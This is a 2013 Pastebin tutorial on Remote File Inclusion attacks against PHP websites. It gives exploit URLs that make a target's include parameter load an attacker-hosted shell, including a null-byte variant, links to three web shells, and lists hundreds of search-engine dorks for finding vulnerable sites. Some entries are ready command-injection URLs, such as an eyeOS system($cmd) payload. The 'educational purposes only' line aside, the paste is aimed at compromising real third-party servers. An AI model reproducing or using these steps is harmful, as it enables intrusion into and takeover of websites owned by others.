87aCk_X

ReMote file inclusion

Aug 29th, 2013
937
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. RFI-Remote File Inclusion. (Easy and short)
  2.  
  3. For educational purposes only!
  4. Hellow, leetcoder users.
  5. First of all what do you need.
  6.  
  7. A vulnerable to RFI site.
  8. (wil be explained detailed in this tutorial.).
  9.  
  10. A shell. (provided in tutorial.)
  11.  
  12. This is a very Easy tutorial.
  13. It is easy because RFI is easy.
  14. But do not get me wrong.
  15. finding vulnerables is the hard part!
  16. Since this is a mistake not alot off people make not man sites are vuln to it.
  17.  
  18. But why do all the trouble using sqli, xss, lfi, csrf, ssi,..
  19. If this one is so easy.
  20. Thats why i make this tutorial.
  21. Part 1. Explenation.
  22. -- What is RFI
  23. -- How to find vulnerables.
  24. -- How to test vulnerability.
  25. Part 2. exploiting.
  26. -- Looking for exploit link.
  27. -- ADD your shell.
  28. part 3. Downloads.
  29. -- Shells.
  30. -- Dorks.
  31.  
  32.  
  33. Part 1. Explenation.
  34. Explenation. What is RFI?
  35.  
  36. RFI or remote file inclusion. is a very easy exploiting methode.
  37. But it is a very uncommon vulnerability.
  38. This gets created by not updating patched or wrongly updating them.
  39. So it still happons.
  40. Remote file inclusion is exactly what it means.
  41. You add (include a file into the directory. remotely.)
  42.  
  43. Explenation. How to find vulnerables.
  44.  
  45. Finding vulnerables is not so different from finding others.
  46. We use dorks.
  47. But how exactly do we get this vulnerability?
  48.  
  49. Well this is a very simple include file.
  50. Code:
  51. <?php
  52. include($_GET['p']
  53. ?>
  54.  
  55. It sais include ['p']
  56. that means in the link it would be something like this:
  57. http://www .[site]. com/index.php?P=travel.php
  58.  
  59. This is importand for our exploit code. later in the tutorial.
  60.  
  61. This could be something else letters, words and so on.
  62. example:
  63. Code:
  64. <?php
  65. include($_GET['RealSteel']
  66. ?>
  67.  
  68. We allready know what this means!
  69. http://www .[site]. com/index.php?RealSteel=travel.php
  70. Its something like ID. no time to explain.
  71.  
  72. To find them? we look for dorks.
  73. or we use scanners and so on.
  74. same as we do whit sqli ;).
  75.  
  76. Explenation. How to test vulnerability.
  77. Easy. we will exploit our full code.
  78. Checking vulnerability is literally exploiting it.
  79. So we can actually skip this step! ^^.
  80.  
  81. Easy aint it :D.
  82.  
  83. part 2.exploiting.
  84. exploiting. Looking for exploit link!
  85.  
  86. simple. change a link like this for example:
  87. Code:
  88. http://www.[site].com/index.php?x=RealSteel
  89. chenge the =realsteel part to a file whe could edit. replace.
  90. Which would be the include.php?
  91.  
  92. Code:
  93. http://www.[site].com/index.php?x=realpage.php
  94. If all good you get no error.
  95. because this file is there! we googled it ^^.
  96.  
  97. exploiting. Add your shell.
  98.  
  99. Exploiting, is changing the include whit your shell.txt do not use it as .php or whatever you did.
  100. Simple upload a shell and add the link.
  101.  
  102. as following:
  103. Code:
  104. http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?
  105. Add the question mark at the end!!
  106.  
  107. If you get an error. try changing the exploit link like following:
  108. Code:
  109. http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?%00
  110. Watch the %00 at the end. its behind the question mark.
  111.  
  112. Part 3. Downloads.
  113. Shells
  114. -----------------
  115. PHPJackal Shell < --- http://pastebin.com/rLq3iQEV
  116. g00nshell v1.3 Final < --- http://pastebin.com/XdhUJ3t5
  117. Root Shell < --- http://pastebin.com/yuLGFxpF
  118. -----------------
  119. Some Dorks :
  120. ---------
  121. inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
  122.  
  123. inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  124.  
  125. inurl:/include/new-visitor.inc.php?lvc_include_dir=
  126.  
  127. inurl:/_functions.php?prefix=
  128.  
  129. inurl:/cpcommerce/_functions.php?prefix=
  130.  
  131. inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
  132.  
  133. inurl:/modules/agendax/addevent.inc.php?agendax_path=
  134.  
  135. inurl:/ashnews.php?pathtoashnews=
  136.  
  137. inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
  138.  
  139. inurl:/pm/lib.inc.php?pm_path=
  140.  
  141. inurl:/b2-tools/gm-2-b2.php?b2inc=
  142.  
  143. inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  144.  
  145. inurl:/modules/agendax/addevent.inc.php?agendax_path=
  146.  
  147. inurl:/includes/include_once.php?include_file=
  148.  
  149. inurl:/e107/e107_handlers/secure_img_render.php?p=
  150.  
  151. inurl:/shoutbox/expanded.php?conf=
  152.  
  153. inurl:/main.php?x=
  154.  
  155. inurl:/myPHPCalendar/admin.php?cal_dir=
  156.  
  157. inurl:/index.php/main.php?x=
  158.  
  159. inurl:/index.php?include=
  160.  
  161. inurl:/index.php?x=
  162.  
  163. inurl:/index.php?open=
  164.  
  165. inurl:/index.php?visualizar=
  166.  
  167. inurl:/template.php?pagina=
  168.  
  169. inurl:/index.php?pagina=
  170.  
  171. inurl:/index.php?inc=
  172.  
  173. inurl:/includes/include_onde.php?include_file=
  174.  
  175. inurl:/index.php?page=
  176.  
  177. inurl:/index.php?pg=
  178.  
  179. inurl:/index.php?show=
  180.  
  181. inurl:/index.php?cat=
  182.  
  183. inurl:/index.php?file=
  184.  
  185. inurl:/db.php?path_local=
  186.  
  187. inurl:/index.php?site=
  188.  
  189. inurl:/htmltonuke.php?filnavn=
  190.  
  191. inurl:/livehelp/inc/pipe.php?HCL_path=
  192.  
  193. inurl:/hcl/inc/pipe.php?HCL_path=
  194.  
  195. inurl:/inc/pipe.php?HCL_path=
  196.  
  197. inurl:/support/faq/inc/pipe.php?HCL_path=
  198.  
  199. inurl:/help/faq/inc/pipe.php?HCL_path=
  200.  
  201. inurl:/helpcenter/inc/pipe.php?HCL_path=
  202.  
  203. inurl:/live-support/inc/pipe.php?HCL_path=
  204.  
  205. inurl:/gnu3/index.php?doc=
  206.  
  207. inurl:/gnu/index.php?doc=
  208.  
  209. inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
  210.  
  211. inurl:/forum/install.php?phpbb_root_dir=
  212.  
  213. inurl:/includes/calendar.php?phpc_root_path=
  214.  
  215. inurl:/includes/setup.php?phpc_root_path=
  216.  
  217. inurl:/inc/authform.inc.php?path_pre=
  218.  
  219. inurl:/include/authform.inc.php?path_pre=
  220.  
  221. inurl:index.php?nic=
  222.  
  223. inurl:index.php?sec=
  224.  
  225. inurl:index.php?content=
  226.  
  227. inurl:index.php?link=
  228.  
  229. inurl:index.php?filename=
  230.  
  231. inurl:index.php?dir=
  232.  
  233. inurl:index.php?document=
  234.  
  235. inurl:index.php?view=
  236.  
  237. inurl:*.php?sel=
  238.  
  239. inurl:*.php?session=&content=
  240.  
  241. inurl:*.php?locate=
  242.  
  243. inurl:*.php?place=
  244.  
  245. inurl:*.php?layout=
  246.  
  247. inurl:*.php?go=
  248.  
  249. inurl:*.php?catch=
  250.  
  251. inurl:*.php?mode=
  252.  
  253. inurl:*.php?name=
  254.  
  255. inurl:*.php?loc=
  256.  
  257. inurl:*.php?f=
  258.  
  259. inurl:*.php?inf=
  260.  
  261. inurl:*.php?pg=
  262.  
  263. inurl:*.php?load=
  264.  
  265. inurl:*.php?naam=
  266.  
  267. allinurl:/index.php?page= site:*.dk
  268.  
  269. allinurl:/index.php?file= site:*.dk
  270.  
  271. INURL OR ALLINURL WITH:
  272.  
  273. /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
  274.  
  275. /includes/header.php?systempath=
  276.  
  277. /Gallery/displayCategory.php?basepath=
  278.  
  279. /index.inc.php?PATH_Includes=
  280.  
  281. /ashnews.php?pathtoashnews=
  282.  
  283. /ashheadlines.php?pathtoashnews=
  284.  
  285. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  286.  
  287. /demo/includes/init.php?user_inc=
  288.  
  289. /jaf/index.php?show=
  290.  
  291. /inc/shows.inc.php?cutepath=
  292.  
  293. /poll/admin/common.inc.php?base_path=
  294.  
  295. /pollvote/pollvote.php?pollname=
  296.  
  297. /sources/post.php?fil_config=
  298.  
  299. /modules/My_eGallery/public/displayCategory.php?basepath=
  300.  
  301. /bb_lib/checkdb.inc.php?libpach=
  302.  
  303. /include/livre_include.php?no_connect=lol&chem_absolu=
  304.  
  305. /index.php?from_market=Y&pageurl=
  306.  
  307. /modules/mod_mainmenu.php?mosConfig_absolute_path=
  308.  
  309. /pivot/modules/module_db.php?pivot_path=
  310.  
  311. /modules/4nAlbum/public/displayCategory.php?basepath=
  312.  
  313. /derniers_commentaires.php?rep=
  314.  
  315. /modules/coppermine/themes/default/theme.php?THEME_DIR=
  316.  
  317. /modules/coppermine/include/init.inc.php?CPG_M_DIR=
  318.  
  319. /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  320.  
  321. /coppermine/themes/maze/theme.php?THEME_DIR=
  322.  
  323. /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  324.  
  325. /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  326.  
  327. /myPHPCalendar/admin.php?cal_dir=
  328.  
  329. /agendax/addevent.inc.php?agendax_path=
  330.  
  331. /modules/mod_mainmenu.php?mosConfig_absolute_path=
  332.  
  333. /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
  334.  
  335. /main.php?page=
  336.  
  337. /default.php?page=
  338.  
  339. /index.php?action=
  340.  
  341. /index1.php?p=
  342.  
  343. /index2.php?x=
  344.  
  345. /index2.php?content=
  346.  
  347. /index.php?conteudo=
  348.  
  349. /index.php?cat=
  350.  
  351. /include/new-visitor.inc.php?lvc_include_dir=
  352.  
  353. /modules/agendax/addevent.inc.php?agendax_path=
  354.  
  355. /shoutbox/expanded.php?conf=
  356.  
  357. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  358.  
  359. /pivot/modules/module_db.php?pivot_path=
  360.  
  361. /library/editor/editor.php?root=
  362.  
  363. /library/lib.php?root=
  364.  
  365. /e107/e107_handlers/secure_img_render.php?p=
  366.  
  367. /zentrack/index.php?configFile=
  368.  
  369. /main.php?x=
  370.  
  371. /becommunity/community/index.php?pageurl=
  372.  
  373. /GradeMap/index.php?page=
  374.  
  375. /index4.php?body=
  376.  
  377. /side/index.php?side=
  378.  
  379. /main.php?page=
  380.  
  381. /es/index.php?action=
  382.  
  383. /index.php?sec=
  384.  
  385. /index.php?main=
  386.  
  387. /index.php?sec=
  388.  
  389. /index.php?menu=
  390.  
  391. /html/page.php?page=
  392.  
  393. /page.php?view=
  394.  
  395. /index.php?menu=
  396.  
  397. /main.php?view=
  398.  
  399. /index.php?page=
  400.  
  401. /content.php?page=
  402.  
  403. /main.php?page=
  404.  
  405. /index.php?x=
  406.  
  407. /main_site.php?page=
  408.  
  409. /index.php?L2=
  410.  
  411. /content.php?page=
  412.  
  413. /main.php?page=
  414.  
  415. /index.php?x=
  416.  
  417. /main_site.php?page=
  418.  
  419. /index.php?L2=
  420.  
  421. /index.php?show=
  422.  
  423. /tutorials/print.php?page=
  424.  
  425. /index.php?page=
  426.  
  427. /index.php?level=
  428.  
  429. /index.php?file=
  430.  
  431. /index.php?inter_url=
  432.  
  433. /index.php?page=
  434.  
  435. /index2.php?menu=
  436.  
  437. /index.php?level=
  438.  
  439. /index1.php?main=
  440.  
  441. /index1.php?nav=
  442.  
  443. /index1.php?link=
  444.  
  445. /index2.php?page=
  446.  
  447. /index.php?myContent=
  448.  
  449. /index.php?TWC=
  450.  
  451. /index.php?sec=
  452.  
  453. /index1.php?main=
  454.  
  455. /index2.php?page=
  456.  
  457. /index.php?babInstallPath=
  458.  
  459. /main.php?body=
  460.  
  461. /index.php?z=
  462.  
  463. /main.php?view=
  464.  
  465. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  466.  
  467. /index.php?file=
  468.  
  469. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  470.  
  471.  
  472. 1. allinurl:my_egallery site:.org
  473. /modules/My_eGallery/public/displayCategory.php?basepath=
  474.  
  475. 2. allinurl:xgallery site:.org
  476. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  477.  
  478. 3. allinurl:coppermine site:.org
  479. /modules/coppermine/themes/default/theme.php?THEME_DIR=
  480.  
  481. 4. allinurl:4nAlbum site:.org
  482. /modules/4nAlbum/public/displayCategory.php?basepath=
  483.  
  484. 5. allinurlP:NphpBB2 site:.org
  485. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  486.  
  487. 6. allinurl:ihm.php?p=
  488.  
  489. 7. Keyword : "powered by AllMyLinks"
  490. /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  491.  
  492. 8. allinurl:/modules.php?name=allmyguests
  493. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  494.  
  495. 9. allinurl:/Popper/index.php?
  496. /Popper/index.php?childwindow.inc.php?form=
  497.  
  498. 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
  499. yahoo = by Kietu? v 3.2
  500. /kietu/index.php?kietu[url_hit]=
  501.  
  502. 11. keyword : "Powered by phpBB 2.0.6"
  503. /html&highlight=%2527.include($_GET[a]),exit.%2527&a=
  504.  
  505. 12. keyword : "powered by CubeCart 3.0.6"
  506. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  507.  
  508. 13. keyword : "powered by paBugs 2.0 Beta 3"
  509. /class.mysql.php?path_to_bt_dir=
  510.  
  511. 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
  512. /ashnews.php?pathtoashnews=
  513.  
  514. 15. keyword : /phorum/login.php
  515. /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
  516.  
  517. 16. allinurl:ihm.php?p=*
  518.  
  519. 14. keyword : "powered eyeOs"
  520. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
  521. diganti dengan :
  522. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);​ ​&a=
  523.  
  524. 15. allinurl:.php?bodyfile=
  525.  
  526. 16. allinurl:/includes/orderSuccess.inc.php?glob=
  527. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  528.  
  529. 17. allinurl:forums.html
  530. /modules.php?name=
  531.  
  532. 18. allinurl:/default.php?page=home
  533.  
  534. 19. allinurl:/folder.php?id=
  535.  
  536. 20. allinurl:main.php?pagina=
  537. /paginedinamiche/main.php?pagina=
  538.  
  539. 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
  540. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  541.  
  542. 22. allinurl:application.php?base_path=
  543. /application.php?base_path=
  544.  
  545. 23. allinurlp:hplivehelper
  546. /phplivehelper/initiate.php?abs_path=
  547.  
  548. 24. allinurlp:hpnuke
  549. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  550.  
  551. 25. key word : "powered by Fantastic News v2.1.2"
  552. /archive.php?CONFIG[script_path]=
  553.  
  554. 26. keyword: "powered by smartblog" AND inurl:?page=login
  555. /index.php?page=
  556.  
  557. 27. allinurl:/forum/
  558. /forum/admin/index.php?inc_conf=
  559.  
  560. 28. keyword:"Powered By FusionPHP"
  561. /templates/headline_temp.php?nst_inc=
  562.  
  563. 29. allinurl:shoutbox/expanded.php filetypep:hp
  564. /shoutbox/expanded.php?conf=
  565.  
  566. 30. allinurl: /osticket/
  567. /osticket/include/main.php?config[search_disp]=true&include_dir=
  568.  
  569. 31. keyword : "Powered by iUser"
  570. /common.php?include_path=
  571.  
  572. 32. allinurl: "static.php?load="
  573. /static.php?load=
  574.  
  575. 33. keyworld : /phpcoin/login.php
  576. /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
  577.  
  578. 34. keyworld: allinurl:/phpGedview/login.php site:
  579. /help_text_vars.php?dir&PGV_BASE_DIRECTORY=
  580.  
  581. 35. allinurl:/folder.php?id=
  582. /classes.php?LOCAL_PATH=
  583.  
  584. inurl:"/lire.php?rub="
  585.  
  586. inurl:"/os/pointer.php?url="
  587.  
  588. inurl:"folder.php?id="
  589.  
  590. inurl:"show.php?page="
  591.  
  592. inurl:"index2.php?DoAction="
  593.  
  594. inurl:"index.php?canal="
  595.  
  596. inurl:"index.php?screen="
  597.  
  598. inurl:"index.php?langc="
  599.  
  600. inurl:"index.php?Language="
  601.  
  602. inurl:"view.php?page="
  603.  
  604. dork: "powered by doodle cart"
  605. rfi of this dork: enc/content.php?Home_Path=
  606.  
  607. dork: "Login to Calendar"
  608. rfi of this dork: /embed/day.php?path=
  609.  
  610. dork: "powered by EQdkp"
  611. rfi of this dork: /includes/dbal.php?eqdkp_root_path=
  612.  
  613. inurl:"template.php?goto="
  614.  
  615. inurl:"video.php?content="
  616.  
  617. inurl:"pages.php?page="
  618.  
  619. inurl:"index1.php?choix="
  620.  
  621. inurl:"index1.php?menu="
  622.  
  623. inurl:"index2.php?ascii_seite="
  624.  
  625. dork: inurl:surveys
  626. rfi to this dork: /surveys/survey.inc.php?path=
  627.  
  628. inurl:"index.php?body="
  629.  
  630. dork: allinurl:adobt sitel
  631. rfi to this dork: /classes/adodbt/sql.php?classes_dir=
  632.  
  633. dork: "Powered By ScozNews"
  634. rfi to this dork: /sources/functions.php?CONFIG[main_path]=
  635. rfi to this dork: /sources/template.php?CONFIG[main_path]=
  636.  
  637. inurl:"kb_constants.php?module_root_path="
  638.  
  639. dork: allinurl:"mcf.php"
  640. rfi to this dork: /mcf.php?content=
  641.  
  642. dork: inurl:"main.php?sayfa="
  643. rfi to this dork: /main.php?sayfa=
  644.  
  645. dork: "MobilePublisherPHP"
  646. rfi to this dork: /header.php?abspath=
  647.  
  648. dork: "powered by phpCOIN 1.2.3"
  649. rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  650.  
  651. allinurl:login.php?dir=
  652.  
  653. inurl:"index.php?go="
  654.  
  655. inurl:"index1.php?="
  656.  
  657. inurl:"lib/gore.php?libpath="
  658.  
  659. inurl:"index2.php?p="
  660.  
  661. inurl:/_functions.php?prefix=
  662.  
  663. inurl:/cpcommerce/_functions.php?prefix=
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×